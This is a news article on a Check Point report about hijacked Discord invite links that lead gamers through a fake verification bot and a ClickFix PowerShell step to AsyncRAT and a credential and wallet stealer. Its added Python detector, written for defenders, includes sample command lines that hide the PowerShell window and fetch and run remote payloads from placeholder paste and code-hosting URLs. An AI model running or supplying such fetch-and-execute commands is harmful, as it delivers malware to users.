- Cybercriminals are hijacking Discord invite links to launch silent and devastating multi-stage malware attacks
- A fake Discord bot tricks users into executing PowerShell commands disguised as CAPTCHA fixes
- Old community invite links now lead to malware servers that steal users' data and digital assets
Cybercriminals are increasingly exploiting a little-known flaw in Discord's invitation system to lure unsuspecting users, particularly gamers, new research has found.
A report by Check Point researchers found that attackers are able to re-register previously valid invite links as custom vanity URLs.
The tactic involves hijacking once-legitimate, trusted Discord invite links that have expired or been deleted, and redirecting them to malicious servers that host multi-stage malware campaigns.
From trusted links to dangerous redirects
These hijacked links, often embedded in old forum posts, community pages or social media, are being used to silently funnel users to Discord servers operated by threat actors.
Once on these fake servers, users are greeted with what appears to be a standard verification process.
A bot called “Safeguard” asks visitors to click a “Verify” button, which starts an OAuth2 flow and redirects them to a phishing site.
The site uses a social engineering technique called “ClickFix”, in which users are tricked into copying and running a PowerShell command under the guise of fixing a broken CAPTCHA.
This action silently starts the malware installation chain, with the attackers using cloud services such as Pastebin, GitHub and Bitbucket to deliver payloads in multiple stages, which lets the traffic blend in with normal network activity.
Initial scripts download executables that retrieve additional encrypted payloads, including AsyncRAT, a tool that gives attackers remote control over infected systems, and a customized variant of the Skuld Stealer designed to extract credentials and cryptocurrency wallet data.
Gamers have become a primary target, and campaigns even disguise malware as tools such as a The Sims 4 DLC unlocker: a file called Sims4-unlocker.zip was downloaded more than 350 times, highlighting the campaign's reach.
Through clever evasion techniques, such as delayed execution and command-line argument checks, the malware often slips past detection even by the best antivirus software.
The threat extends beyond typical malware infections. The Skuld Stealer used in these attacks can extract crypto wallet seed phrases and passwords, effectively granting total control over the victims' digital assets.
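The chain described above (a user pastes a PowerShell one-liner from a "fix" page, the command hides its window, fetches a stage from a public paste or code-hosting service, and sometimes sleeps before acting) leaves a recognisable trace in process-creation telemetry. The following is an added detection example written for this article; it is not code from Check Point or the article's author. It assumes Sysmon-style process-creation fields (`Image`, `ParentImage`, `CommandLine`, `ProcessId`), and the sample events, hostnames and scoring weights are constructed for illustration.

```python
"""Score process-creation events for ClickFix-style PowerShell launches.

Added example, not from the article or the Check Point report. Field names
follow the Sysmon Event ID 1 / Windows 4688 layout; weights are assumptions.
"""
import re
from dataclasses import dataclass

# Services the article names as payload delivery points (assumed host names).
PAYLOAD_HOSTS = ("pastebin.com", "raw.githubusercontent.com", "github.com", "bitbucket.org")

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_CMD = re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
DOWNLOADER = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b", re.I)
INVOKE = re.compile(r"\biex\b|invoke-expression", re.I)
DELAY = re.compile(r"start-sleep|\btimeout\b", re.I)          # delayed execution, as the article notes
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.I)


@dataclass
class Finding:
    process_id: int
    score: int
    reasons: list


def score_event(event):
    """Return a Finding; only PowerShell launches are scored, everything else is 0."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    reasons, score = [], 0
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return Finding(event["ProcessId"], 0, reasons)
    # ClickFix tells the victim to paste into the Run dialog, so the parent is explorer.exe.
    if parent.endswith("explorer.exe"):
        score += 2; reasons.append("interactive launch from explorer.exe")
    if HIDDEN_WINDOW.search(cmd):
        score += 2; reasons.append("hidden window")
    if ENCODED_CMD.search(cmd):
        score += 2; reasons.append("encoded command")
    if DOWNLOADER.search(cmd):
        score += 1; reasons.append("downloader cmdlet")
    if INVOKE.search(cmd):
        score += 1; reasons.append("in-memory invocation")
    if DELAY.search(cmd):
        score += 1; reasons.append("delayed execution")
    hosts = {h.lower() for h in URL_HOST.findall(cmd)}
    hits = sorted(h for h in hosts if any(h == p or h.endswith("." + p) for p in PAYLOAD_HOSTS))
    if hits:
        score += 2; reasons.append("fetch from paste/code-hosting service: " + ", ".join(hits))
    return Finding(event["ProcessId"], score, reasons)


def detect(events, threshold=5):
    """Events at or above the threshold; a lone GitHub download stays below it."""
    return [f for f in (score_event(e) for e in events) if f.score >= threshold]


# Constructed sample events (not real telemetry). URLs use placeholder paths.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iex (iwr https://pastebin.com/raw/EXAMPLE_ID).Content"'},
    {"ProcessId": 5532, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'pwsh -NoProfile -Command "Get-Service -Name Spooler"'},
    {"ProcessId": 6011, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -WindowStyle Hidden -Command "Start-Sleep 30; Start-BitsTransfer '
                    r'-Source https://bitbucket.org/EXAMPLE/raw/stage2.exe -Destination $env:TEMP\stage2.exe"'},
    {"ProcessId": 7102, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -Command "Invoke-WebRequest https://raw.githubusercontent.com/EXAMPLE/tool/main/install.ps1 -OutFile install.ps1"'},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f.process_id, f.score, "; ".join(f.reasons))
```

The point of the weighting is the last sample: an administrator pulling a script from GitHub scores 3 and is not reported, while the two explorer-launched, hidden-window fetches score 8. In production the same logic would be expressed as a SIEM rule over the real event stream, and the host list and threshold tuned to the environment.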
Given the focus on cryptocurrency theft and credential harvesting, people should reinforce their defenses with solid identity theft protection services.
These tools can monitor for unauthorized use of personal information, alert users to breaches and help recover compromised digital identities.
While some might assume that endpoint protection tools would shield them from these tactics, the attack's modular, multi-layered structure often flies under the radar.
To stay safe, users should be wary of Discord invite links, especially those embedded in old content, and avoid running unexpected scripts or following suspicious verification steps.